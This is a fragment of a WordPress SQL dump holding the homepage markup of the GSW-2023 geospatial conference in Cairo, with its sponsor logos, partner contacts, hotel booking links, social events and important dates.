(5195,1,'2023-08-15 04:27:55','2023-08-15 04:27:55','','d2','','inherit','open','closed','','d2-2','','','2023-08-15 04:27:55','2023-08-15 04:27:55','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/d2-1.jpg',0,'attachment','image/jpeg',0),
(5196,1,'2023-08-15 04:28:21','2023-08-15 04:28:21','','d1','','inherit','open','closed','','d1-2','','','2023-08-15 04:28:21','2023-08-15 04:28:21','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/d1-1.jpg',0,'attachment','image/jpeg',0),
(5197,1,'2023-08-15 04:28:32','2023-08-15 04:28:32','<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195  aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"254\" height=\"254\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" 